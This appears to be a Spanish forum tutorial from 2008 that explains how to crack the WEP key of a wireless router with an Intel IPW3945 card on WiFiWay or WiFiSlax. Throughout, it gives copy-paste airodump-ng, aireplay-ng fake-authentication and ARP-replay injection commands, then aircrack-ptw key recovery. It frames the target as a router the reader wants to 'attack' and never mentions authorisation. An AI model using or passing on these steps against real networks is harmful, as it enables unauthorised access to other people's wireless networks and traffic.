Actualizado el 27 Junio 2008
Bueno deciros que con copiar y pegar inyectareis:
Es necesario tener en cuenta la siguiente lista para que todo vaya bien:
-Tener la tarjeta wifi
Intel IPW3945 no sirven modelos superiores.
-A ser posible que sea en portatil (no conozco esta tarjeta wifi en los sobremesa... pero por si acaso)
-Tener buena calidad de señal ya que si la señal es débil no inyectareis.
-Se han dado casos que con buena señal no se inyectaba, el problema se suele resolver moviendo el portatil hacia otro lugar para evitar interenferencias con otros aparatos que esten por los 2.4gz que usa el wifi. (microhondas...) Además la IPW3945 flojea un poco a la hora de enviar datos por lo que puedes tener 90% recibiendo y 10% enviando.
Descargar
WIFIWAY 0.4 -
WIFIWAY 0.6 -
WIFIWAY 0.8 de nuestro amigo
Hwagm o el
WIFISLAX 3.1PASOSAbrimos una consola
kwrite /sys/class/net/wifi0/device/channel
Importante: El canal AP debe corresponder al mismo canal del router que queremos atacar, eso lo podeis ver cuando ejecutáis vuestro sistema operativo y buscais redes wifi.Canal de AP si pones
11 (
11 es un ejemplo) normalmente muestra algunos puntos de acceso cuando ejecutes airodump, guardamos y cerramos. Los canales oscilan de 1 a 13 aunque en algunas ocasiones he visto mas de 13.
Cogemos el BSSID del AP (router)
airodump-ng wifi0
Una vez aparezcan los BSSID pulsamos
CTRL+C (para parar el proceso)
kwrite /sys/class/net/wifi0/device/bssid
Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay incompatibilidades si cerramos.
airodump-ng -c CANAL DEL AP -w DATOS wifi0
Abrimos otra consola
kwrite /sys/class/net/wifi0/device/rate
Lo ponemos a
2, guardamos y cerramos.
Para ahorrarnos estos pasos os podeis
DESCARGAR EL SIGUIENTE SCRIPT solo válido para la distribución de
wifiway.
Para ejecutarlo poner en consola (shell) y seguir los pasos.
./ipw3945.sh
Seguimos con la inyección, levantamos la interfaz wifi
ifconfig wifi0 up
Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr cambiamos los "
- " por "
: " (guiones por dos puntos)
Ejemplo:
12-58-47-FD-AD-8F-00-00-00-00 se cambia por
12:58:47:FD:AD:8Fifconfig
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
También podeis poner
aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0
de esta manera se asocia automáticamente cada 10 segundos para aquellos que pillais alguna ARP y luego no suben.
Una vez autentificados abrimos otra consola y ponemos
aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0
Esperamos un rato como mucho 15 minutos y veréis como suben los ARP.
El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el AP0 pero no lo he probado.
Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Y lo ejecutáis de nuevo hasta que os autentifique o se os suban los ARP.
Si no autentifica fijaros que el
RXQ (airodump-ng) se mantenga por encima del 50% de no ser así los DATA no subirán rápido, normalmente es debido a que el ARP se encuentra demasiado lejos.
Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejecutamos en otra consola.
aircrack-ptw DATOS-01.cap
No es necesario parar los procesos para buscar la clave, puede seguir subiendo DATA por si acaso no encuentra la clave WEP y volver a intentarlo más adelante por ejemplo con 150.000 DATA
Al cabo de un rato (un minuto como máximo) os saldrá
KEY FOUND con la clave wep.
Salu2
